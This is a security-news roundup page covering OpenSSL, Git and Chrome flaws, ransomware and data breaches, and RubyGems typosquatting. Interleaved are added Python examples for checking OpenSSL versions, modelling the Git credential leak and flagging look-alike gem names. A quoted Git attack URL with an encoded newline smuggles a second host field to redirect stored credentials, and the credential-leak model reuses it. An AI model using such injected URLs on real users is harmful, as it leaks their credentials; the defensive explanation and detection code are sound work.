
Security

Security Leftovers

Filed under
Security
  • Security updates for Thursday

    Security updates have been issued by Arch Linux (openssl), openSUSE (freeradius-server, kernel, thunderbird, and vlc), Oracle (git, java-1.7.0-openjdk, java-1.8.0-openjdk, and java-11-openjdk), SUSE (ardana-ansible, ardana-barbican, ardana-db, ardana-monasca, ardana-mq, ardana-neutron, ardana-octavia, ardana-tempest, crowbar-core, crowbar-ha, crowbar-openstack, documentation-suse-openstack-cloud, memcached, openstack-manila, openstack-neutron, openstack-nova, pdns, python-amqp, rubygem-puma, zookeeper, cups, kernel, ovmf, and pacemaker), and Ubuntu (openjdk-8, openjdk-lts and re2c).

  • Daniel Stenberg: Report: curl’s bug bounty one year in

    On April 22nd 2019, we announced our current, this, incarnation of the curl bug bounty. In association with Hackerone we now run the program ourselves, primarily funded by gracious sponsors. Time to take a closer look at how the first year of bug bounty has been!

  • Firefox’s Bug Bounty in 2019 and into the Future

    Firefox has one of the oldest security bug bounties on the internet, dating back to 2004. From 2017-2019, we paid out $965,750 to researchers across 348 bugs, making the average payout $2,775 – but as you can see in the graph below, our most common payout was actually $4,000!

  • Multiple Malware Campaigns Demonstrate How Cybercriminals Exploit SSH Keys
  • How Healthcare Providers Can Prevent Security Vulnerabilities

    Unfortunately, despite strict compliance regulations, there are still many exploited vulnerabilities and misconfigurations that occur in healthcare systems. These issues can result in serious breaches of security and patient privacy and must be corrected.

    Some of these issues are outside of your control. For example, if vendors unknowingly leave bugs in software or have not yet provided a patch for known vulnerabilities. Others occur due to poor management or lack of best practices. For example, not properly restricting access privileges or not encrypting data.

    [...]

    The consequences of a regular data breach range from monetary fines to loss of brand authority, and sometimes even bankruptcy. However, the consequences of a breached healthcare environment can be a matter of life and death.

    To ensure the security of healthcare data, providers should implement a number of strategies. Security strategies for healthcare providers include enforcing granular access controls, as well as staying updated on vulnerabilities and prioritizing mitigation on a continual basis.

    For improved visibility and better control, you can also centralize your overall security. However, what could help most is establishing a security culture that educates personnel and reduces the scope of insider threats. This can help enlist connected users to the overall protection of healthcare networks, systems, and data.

  • Microsoft Issues Out-Of-Band Security Update For Office, Paint 3D

    Microsoft has released an out-of-band security update for Microsoft Office, Office 365 ProPlus and Paint 3D. The applications are affected by multiple Autodesk vulnerabilities that, if exploited, could enable remote code execution.

Locking Down Linux For The Enterprise

Filed under
GNU
Linux
Security
Ubuntu

Security has always been important for datacenter operators, but the days of putting a ring of protection around the datacenter and then walking away satisfied in the knowledge that the data and applications therein were protected from outside forces are long over. Cloud computing, the Internet of Things (IoT), the edge, containers and the rapid growth in the number of mobile devices have all contributed to the expansion of IT outside of core datacenters, creating a highly distributed environment where the bulk of data is created and applications are accessed beyond the firewall. Add in the growing numbers and increasing sophistication of cyber-threats and security becomes a much more complex calculation.

Because of this, the growing expectation for years now has been that hardware, component and software makers would embed security into their products to ensure security regardless of whether they were running in the datacenter or somewhere out in the wild. Enterprises will gravitate toward vendors with reputations for strong security and privacy features in their offerings, which can drive growth for those that make the investment. It’s something that Canonical is emphasizing as it looks to extend its open-source Ubuntu Linux operating system deeper into the enterprise and cloud datacenters.

Read more

IPFire 2.25 - Core Update 144 is available for testing

Filed under
GNU
Linux
Security

Less than 48 hours after releasing IPFire 2.25 - Core Update 143, we already have the next update ready for testing. It is full with fixes for security vulnerabilities in OpenSSL, the squid web proxy, the DHCP client and more.

The OpenSSL team has issued a security advisory for the 1.1.1 release with "high" severity.

Applications on the client or server side that call SSL_check_chain() during a TLSv1.3 handshake may crash due to incorrect handling of the "signature_algorithms_cert" TLS extension.

CVE-2020-1967 has been assigned to track this vulnerability and an immediate installation of this update is recommended.
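A quick way to tell whether a host's OpenSSL build falls inside the range the advisory covers, as an added example that is not part of IPFire's announcement or OpenSSL's own code. It assumes the advisory's affected range (1.1.1d, 1.1.1e and 1.1.1f, with the fix in 1.1.1g), and it only answers the version question: whether the crash is reachable on a given box still depends on the application actually calling SSL_check_chain(), as the announcement says.

```python
"""Classify an OpenSSL version string against the CVE-2020-1967 fix level.

Added example, not IPFire's or OpenSSL's code. Assumed affected range:
1.1.1d through 1.1.1f; 1.1.1g carries the fix. 1.0.2 has no TLS 1.3 and
is out of scope, and OpenSSL 3.x drops the letter suffix entirely.
"""
import re
import ssl

FIRST_AFFECTED = (1, 1, 1, "d")
FIXED = (1, 1, 1, "g")


def parse_openssl_version(text):
    """Turn 'OpenSSL 1.1.1f  31 Mar 2020' or '1.1.1f' into (1, 1, 1, 'f').

    The trailing letter is OpenSSL's patch level; a missing letter
    (plain '1.1.1') sorts before 'a', which is what tuple comparison
    gives us for free because '' < 'a'.
    """
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)([a-z]*)", text)
    if not m:
        raise ValueError(f"no OpenSSL version found in {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))


def is_affected(version):
    """True when the parsed version lies in [1.1.1d, 1.1.1g)."""
    return FIRST_AFFECTED <= version < FIXED


def assess(text):
    """Human-readable verdict for a version string such as `openssl version` prints."""
    v = parse_openssl_version(text)
    if is_affected(v):
        return "affected: upgrade to OpenSSL 1.1.1g or later"
    return "not in the affected range"


if __name__ == "__main__":
    # Check the OpenSSL this interpreter is linked against.
    print(ssl.OPENSSL_VERSION, "->", assess(ssl.OPENSSL_VERSION))
```

Feed it the output of `openssl version` from each host (or `ssl.OPENSSL_VERSION` from a Python process, as the `__main__` block does) and treat "affected" as a prompt to apply the distribution update rather than as proof of exploitability.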

Read more

Security Leftovers

Filed under
Security
  • Why Online Voting Won't Work, Even in a Pandemic

    But as Motherboard has reported extensively, voting machines and using the internet in any way to exercise our most democratic right could call into question the integrity of the results and leave systems vulnerable to manipulation. Or, as the Democratic party discovered during its Iowa caucuses this past January, the entire vote count is at the mercy of a terrible app.

    On this week’s CYBER we have Motherboard reporter Lorenzo Franceschi-Bicchierai on to discuss why online voting isn't ready for prime time.

  • Massachusetts, Indiana Settle With Equifax Over 2017 Data Breach

    As part of a settlement approved in January, Equifax will have to set aside $380 million for payments to affected individuals, attorney fees of $80 million, and other costs. The states that filed a lawsuit against the company will receive a total of $175 million.

    However, Massachusetts and Indiana are not included in that multistate settlement as they filed their own lawsuits against Equifax. The attorneys general of Massachusetts and Indiana announced last week that they have each reached a settlement with the company for $18.2 million and $19.5 million, respectively.

    The Equifax breach impacted roughly 3.9 million residents of Indiana and nearly 3 million people in Massachusetts.

  • Detroit hospital network says data breach affected more than 100,000 patient accounts [iophk: Windows TCO]

    The attack against the hospital network occurred months before U.S. facilities started responding to the COVID-19 pandemic.

  • Beaumont security breach puts personal information of 112,000 people at risk [iophk: Windows TCO]

    Beaumont discovered in late March that employee email accounts had been accessed May 23-June 3, 2019 by a third party, potentially compromising such patient information as name, date of birth, diagnosis, diagnosis code, procedure, treatment location, treatment type, prescription information, Beaumont patient account number, and Beaumont medical record number.

  • IT Services Giant Cognizant Attacked by ‘Maze’ Ransomware [iophk: Windows TCO]

    The company, which has about 300,000 employees, said it was hit by the “Maze” #ransomware group and is engaging law enforcement authorities.

  • Cognizant Hit by 'Maze' Ransomware Attack [iophk: Windows TCO]

    According to cybersecurity firm McAfee, [attackers] who deploy Maze threaten to release information on the [Internet] if the targeted companies fail to pay.

    "We are in ongoing communication with our clients and have provided them with indicators of compromise and other technical information of a defensive nature," Cognizant added.

    It did not respond to a request from Reuters for further comments on the incident.

  • Cognizant hit by ‘Maze’ ransomware attack [iophk: Windows TCO]

    “Cognizant can confirm that a security incident involving our internal systems, and causing service disruptions for some of our clients, is the result of a Maze ransomware attack,” Cognizant said in a statement. It added that its internal security teams, supplemented by leading cyber defense firms, are actively taking steps to contain this incident.

  • Cognizant hit by 'Maze' ransomware attack [iophk: Windows TCO]

    New-Jersey headquartered IT services provider Cognizant on Saturday said that it had faced a ransomware attack on Saturday that has caused disruptions to its clients.

    The company released a statement on Saturday on its official website. “Cognizant can confirm that a security incident involving our internal systems, and causing service disruptions for some of our clients, is the result of a Maze ransomware attack,” it said.

    The Maze ransomware was discovered in 2019 and has since gained notoriety.

  • COVID-19’s impact on Tor

    We had to let go of 13 great people who helped make Tor available to millions of people around the world. We will move forward with a core team of 22 people, and remain dedicated to continuing our work on Tor Browser and the Tor software ecosystem.

  • Tor Project lets go of a third of staff due to COVID-19

    The Tor Project, the non profit organization behind the Tor (The Onion Router) Browser, has let go of roughly a third of its staff due to the COVID-19 crisis. Tor is known as a private browser developed for use by dissidents in oppressive countries and others that need their internet use anonymized. Tech companies and organizations around the world have been affected by this pandemic, and it’s sobering to see the Tor Project have to let go of staff during this time period where Tor use is arguably ever more crucial.

  • Security updates for Tuesday

    Security updates have been issued by Arch Linux (webkit2gtk), Debian (awl, git, and openssl), Red Hat (chromium-browser, git, http-parser, java-1.7.0-openjdk, java-1.8.0-openjdk, java-11-openjdk, qemu-kvm-ma, rh-git218-git, and rh-maven35-jackson-databind), Scientific Linux (advancecomp, avahi, bash, bind, bluez, cups, curl, dovecot, doxygen, evolution, expat, file, firefox, gettext, git, GNOME, httpd, ImageMagick, java-1.7.0-openjdk, java-1.8.0-openjdk, java-11-openjdk, kernel, lftp, libosinfo, libqb, libreoffice, libsndfile, libxml2, mailman, mariadb, mod_auth_mellon, mutt, nbdkit, net-snmp, okular, php, polkit, poppler and evince, python, python-twisted-web, python3, qemu-kvm, qt, rsyslog, samba, squid, taglib, telnet, texlive, thunderbird, unzip, wireshark, and zziplib), SUSE (apache2), and Ubuntu (git and python2.7, python3.4, python3.5, python3.6, python3.7).

  • Russian IT Security Updates

    As part of the April "Patch Tuesday", Microsoft fixed 113 vulnerabilities in various products, including three zero-day vulnerabilities in Windows that were used in attacks to execute arbitrary code and increase privileges.

    Two zero-day issues (CVE-2020-1020 and CVE-2020-0938) were contained in Adobe Type Manager Library and affected all supported versions of Windows, including Windows 7.

    The third vulnerability (CVE-2020-1027) affected the Windows kernel and allowed the attacker to increase their privileges and execute code with kernel privileges.

Chromium/Chrome Issues

Filed under
Google
Security
Web
  • Over 2 billion Google Chrome users warned of security risk on Windows, macOS and Linux

    Google has issued a critical warning for Chrome users across Windows, macOS and Linux, and has advised users to update their apps to the latest version of the build. A stable release version 81.0.4044.113 of Chrome is being seeded by Google and will reach users in the coming weeks.

    In a short blog post, Google warned users of its popular browser Chrome to update to the latest version whenever available. This is due to a bug that made the browser vulnerable to attack and exploitation. Having said that, the details about this particular security risk is being kept under wraps as Google wants to first get the latest update to users that fixes the issue.

  • Google Releases Much-Awaited Chrome Update; Alerts 2 Billion Users About Security Flaws Across Windows, Mac & Linux

    "The stable channel has been updated to 81.0.4044.113 for Windows, Mac, and Linux, which will roll out over the coming days/weeks," Google said in a blog post last week. "This update includes 1 security fix," it added.

    [...]

    "The community help forum is also a great place to reach out for help or learn about common issues," Google said. "Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," it added.

  • Google Issues Warning For 2 Billion Chrome Users

    Are you a Google Chrome user? Google has issued a warning of a vulnerability in its Chrome browser across Windows, Mac and Linux - urging users to upgrade to the latest version of the browser (81.0.4044.113).

    Google just gave its two billion Chrome users a brilliant (if long overdue) upgrade, but it doesn’t mask all of the controversial changes, security problems and data concerns which have worried users about the browser recently. And now Google has issued a new critical warning you need to know about.

    Picked up by security specialist Sophos, Google has quietly issued a warning that Chrome has a critical security flaw across Windows, Mac and Linux and it urges users to upgrade to the latest version of the browser (81.0.4044.113). Interestingly, at the time of publication, Google is also keeping the exact details of the exploit a mystery.

  • Google Chrome and desktop icon refresh problem

    Looking around, I did find a Chromium bug report from 2015, which also mentioned a workaround. Needless to say, the specific workaround is no longer available, as the user icon is no longer present in the Chrome window border, and flags occasionally come and go, as they represent experimental browser features. But this was a good starting point, so I went about testing and tweaking, until I found the right solution. After me.

Wireguard – the open-source answer to VPN shortfalls?

Filed under
GNU
OSS
Security

Most end-users’ experiences of VPNs (virtual private networks) are from when they’ve needed to “dial into” the office or workplace, remotely.

That’s something that, right now, millions of people have to do from their homes. And while many organizations’ resources are located in the cloud, there’s still a significant number of services, applications, filestores, and resources that are on-premise — thus the continuing need for VPNs to gain access.

“Dialing-in” is often still the terminology used in conversation, but that’s ironic because the process of working inside a VPN “tunnel” is very much reminiscent of the days of dial-up internet connections: slow to establish connection, glacial in responsiveness of apps & services, prone to breaking, and often the subject of frustration (and irritable calls to IT support staff).

Read more

Git v2.26.2 and others

Filed under
Development
Security
  • Git v2.26.2 and others
    Today, the Git project is releasing the following Git versions:
    
        v2.26.2, v2.25.4, v2.24.3, v2.23.3, v2.22.4, v2.21.3, v2.20.4,
        v2.19.5, v2.18.4, and v2.17.5.
    
    These releases address the security issue CVE-2020-11008, which is
    similar to the recently addressed CVE-2020-5260.
    
    Users of the affected maintenance tracks are urged to upgrade.
    
    The tarballs are found at:
    
        https://www.kernel.org/pub/software/scm/git/
    
    The following public repositories all have a copy of the 'v2.26.2'
    and other tags:
    
      url = https://kernel.googlesource.com/pub/scm/git/git
      url = git://repo.or.cz/alt-git.git
      url = https://github.com/gitster/git
    
    Attached below is the release notes for 2.17.5; all the newer
    maintenance tracks listed at the beginning of this message are
    updated with the same fix, so I won't repeat them here.
    
    Thanks.
    
  • Git Sees Another Round Of New Releases Due To Security Issue

    Last week saw a slew of new Git releases due to a security issue over the newline character creating a possible credential leak. This week is another round of emergency Git releases due to a similar security bug.

    Git 2.26.2 is out today along with new point releases from Git 2.25 through Git 2.17. These new Git releases are coming as a result of a similar security bug to last week's problem.

IPFire 2.25 - Core Update 143 released

Filed under
Security

Hey all you cool cats and kittens,

this is the official release announcement for IPFire 2.25 - Core Update 143 - another update that brings you loads of improvements for IPFire and its build system. We have updated the toolchain and many other essential system libraries as well as including many bug and security fixes.

The toolchain - all tools to build the distribution like compilers, linkers and essential system libraries - have been updated and are now based on glibc 2.31, GCC 9.3.0, binutils 2.34.

The build system has also been optimised to take advantage of machines that have a lot of memory and uses less I/O resources by not writing any large temporary files to disk any more when this can be avoided.

Read more

Security and FUD

Filed under
GNU
Linux
Security
  • Security updates for Monday

    Security updates have been issued by Arch Linux (openvpn), Debian (awl, file-roller, jackson-databind, and shiro), Fedora (chromium, git, and libssh), Mageia (php, python-bleach, and webkit2), openSUSE (chromium, gstreamer-rtsp-server, and mp3gain), Oracle (thunderbird and tigervnc), SUSE (thunderbird), and Ubuntu (file-roller and webkit2gtk).

  • Linux is secure - it is its users who are not

    Most exploits are misconfigurations or poor administration

    The rise in attacks on Linux in recent years is not due to its insecurity problems but more down to user error.

    LinuxSecurity Founder Dave Wreski said: "Although it may be easy to blame the rise in attacks targeting Linux in recent years on security vulnerabilities in the operating system as a whole, this is simply not the truth. The majority of exploits on Linux systems can be attributed to misconfigured servers and poor administration."

    Joe McManus, Director of Security at Canonical, said: "Linux and, particularly Ubuntu, are incredibly secure systems but, that being said, it is their popularity that makes them a target."

    Ian Thornton-Trump, a threat intelligence expert and the CISO at Cyjax, added: "From an economic and mission perspective, it makes sense for a threat actor to invest in open-source skills for flexibility and the ability to target the systems where the good stuff is happening."

  • 01 Communique Announces April 23rd IronCAP X Email Encryption Product Launch and Demo Will Be Virtual [Ed: If this is proprietary secret code, how do we know it is indeed "a higher protection level than current GPG, or GNU Privacy Guard public key cryptography implementation platforms"?]

    IronCAP and IronCAP X will encrypt your data so that you are protected now and into the future from quantum attacks. Not only is IronCAP technology quantum-safe, it is much faster than the current quantum-vulnerable RSA method and has a higher protection level than current GPG, or GNU Privacy Guard public key cryptography implementation platforms.

Security and Proprietary Issues

Filed under
Security
  • Bitcoin stealer infected 700+ libraries of major programming language

    A cybersecurity firm discovered that over 700 libraries of the popular programming language, Ruby, contained malicious Bitcoin-stealing software.

    ReversingLabs, based in Cambridge, Massachusetts, disclosed its findings in a blog post on Thursday. Back in February, it wrote, hackers placed malicious files inside a package manager called RubyGems—which is usually used to upload and share improvements on existing pieces of software.

    The hackers were trying to trick developers into downloading malware by using a method called “typosquatting”, which consists of uploading malicious packages with similar names to regular ones. By just changing a few characters of a file name, the hope was that a developer would mistakenly download an infected package—unwittingly providing the hacker with access to their system.

  • Find the Sweet Spot: Open Source Software, Military Systems and Cybersecurity
  • This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

    Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
    url = "https://one.example.com?%0ahost=two.example.com/foo.git"

    So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.

  • Alibaba to Invest $28 Billion Over Three Years in Cloud

    The Chinese e-commerce giant plans to build more datacenters to complement an existing network covering 21 regions around the world, the company said in a statement. It will continue to develop its own technologies in areas such as AI-inference chips to support that expansion in cloud services, it added.

  • Hospitals brace for increase in cyberattacks

    As hospitals face a surge in patients and critical equipment shortages stemming from the coronavirus pandemic, they are increasingly becoming the target of [attackers] who see health care facilities as easy prey.

    Ransomware attacks, in which [attackers] lock up a network and demand payment to return access to these systems, have presented a growing threat to hospitals since January.

    Experts are warning that they expect these attacks to increase and that the threat has captured the attention of top intelligence lawmakers, who warn the outbreak and the ransomware attacks create the perfect storm.

  • CDC plans to roll out app in May to speed up COVID-19 case reporting

    The Centers for Disease Control and Prevention (CDC) plans to roll out an app in May that will accelerate electronic case reporting of COVID-19 cases.

    The app, based on Fast Healthcare Interoperability Resources (FHIR) standards, can be implemented quickly to automate COVID case reporting, said Laura Conn, health scientist and eCR lead in the CDC's Center for Surveillance, Epidemiology, and Laboratory Services.

    The app enables healthcare providers that don't have the capability to automatically send case reports from their health IT systems to more efficiently send data to public health agencies.

  • Judge dismisses Twitter lawsuit pushing to reveal US surveillance requests

    Rogers clarified that the government’s use of confidential declarations convinced her that unearthing the exact number of national security letters dating back to 2014, as requested by Twitter, would put national security at risk.
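The credential leak described under "This Week In Security" above (and the Git v2.26.2 post earlier on this page, whose CVE-2020-11008 is said to be of the same kind) comes down to Git's credential-helper protocol being line-oriented: a percent-encoded newline in the URL, once decoded, turns into an extra `host=` line in the request sent to the helper. The model below is an added example and not Git's code. Its `split_url` parser and in-memory `STORE` stand in for Git's URL parsing and for a helper such as git-credential-store; the credentials and hostnames are constructed. The newline check mirrors the flaw the page describes; the empty-host check is this model's own extra hardening and not a description of what the CVE-2020-11008 fix does.

```python
"""Model of how a crafted URL redirects a credential-helper lookup.

Added example, not Git's code. split_url and STORE are constructed
stand-ins for Git's credential_from_url and a git-credential-store
style helper. Hostnames and secrets below are made up.
"""
from urllib.parse import unquote

# Constructed store of saved credentials, keyed by host.
STORE = {
    "one.example.com": ("alice", "token-for-one"),
    "two.example.com": ("alice", "token-for-two"),
}


def split_url(url):
    """Minimal scheme://host/path split: the host runs to the first '/'
    after '://', and host and path are percent-decoded afterwards."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        raise ValueError("URL has no scheme")
    host, _, path = rest.partition("/")
    return scheme, unquote(host), unquote(path)


def request_vulnerable(url):
    """Helper request built without inspecting the decoded values: a %0a
    inside the host becomes a second 'host=' line in the request."""
    scheme, host, _path = split_url(url)
    return f"protocol={scheme}\nhost={host}\n"


def request_fixed(url):
    """Same request, refusing any component that carries a line break
    (the CVE-2020-5260 class). Rejecting an empty host is this model's
    own extra hardening."""
    scheme, host, path = split_url(url)
    if not host:
        raise ValueError("URL has no host")
    for value in (scheme, host, path):
        if "\n" in value or "\r" in value:
            raise ValueError("line break in URL component")
    return f"protocol={scheme}\nhost={host}\n"


def helper_lookup(request):
    """Parse key=value lines the way a helper does; a repeated key keeps
    its last value. Returns the stored (user, secret) for the host."""
    fields = {}
    for line in request.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key] = value
    return STORE.get(fields.get("host"))


def rejected_by_fix(url):
    """True when the hardened request builder refuses the URL."""
    try:
        request_fixed(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    crafted = "https://one.example.com?%0ahost=two.example.com/foo.git"
    print(repr(request_vulnerable(crafted)))
    print("helper answers with:", helper_lookup(request_vulnerable(crafted)))
    print("hardened builder rejects it:", rejected_by_fix(crafted))
```

Run as a script it prints the doubled `host=` request, shows the helper handing back the credentials stored for two.example.com even though the connection is to one.example.com, and shows the hardened builder refusing the URL outright. The general lesson carries beyond Git: any time user-controlled strings are serialised into a line- or key-value-oriented protocol, reject or escape the delimiter before writing.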
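The RubyGems item above describes typosquatting as uploading packages whose names differ from popular ones by a few characters. A manifest check for exactly that, as an added example that is not ReversingLabs' or RubyGems' code: it assumes a short allow-list of well-known gem names and a constructed Gemfile, and flags any dependency that is not on the allow-list but sits within two edits of a name that is. The same edit-distance check applies to any package manager's manifest, not only to RubyGems.

```python
"""Flag look-alike dependency names in a Gemfile.

Added example, not ReversingLabs' or RubyGems' code. POPULAR and GEMFILE
are constructed for illustration; in practice POPULAR would be the list
of gems your organisation actually uses or the registry's top downloads.
"""
import re

# Constructed allow-list of well-known gem names.
POPULAR = {"rails", "rake", "nokogiri", "rspec", "bundler", "devise", "puma"}

# Constructed Gemfile with two look-alike names slipped in.
GEMFILE = """
source "https://rubygems.org"
gem "rails", "~> 6.0"
gem "nokogiri"
gem "rspec"
gem "nokogirl"
gem "pumma"
gem "sidekiq"
"""


def levenshtein(a, b):
    """Edit distance with insert, delete and substitute all costing 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete from a
                           cur[j - 1] + 1,         # insert into a
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def gem_names(gemfile_text):
    """Yield the name from every `gem "name"` line of a Gemfile."""
    for line in gemfile_text.splitlines():
        m = re.match(r"""\s*gem\s+["']([^"']+)["']""", line)
        if m:
            yield m.group(1)


def suspicious(names, popular=POPULAR, max_distance=2):
    """Names not on the allow-list but within max_distance edits of one.

    Returns [(name, nearest_allow_listed_name, distance)] so a reviewer can
    see which well-known package each entry is imitating.
    """
    hits = []
    for name in names:
        if name in popular:
            continue
        best = min(popular, key=lambda p: levenshtein(name, p))
        d = levenshtein(name, best)
        if d <= max_distance:
            hits.append((name, best, d))
    return hits


if __name__ == "__main__":
    for name, nearest, d in suspicious(gem_names(GEMFILE)):
        print(f"{name!r} is {d} edit(s) from {nearest!r}; check it")
```

A distance threshold of two catches single-character swaps and the doubled or dropped letters the article mentions; a genuinely unrelated gem such as the constructed "sidekiq" entry is far from every allow-listed name and is left alone. Wire the check into CI on the lockfile, and treat a hit as a prompt to confirm the package's author and download history before the build proceeds.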
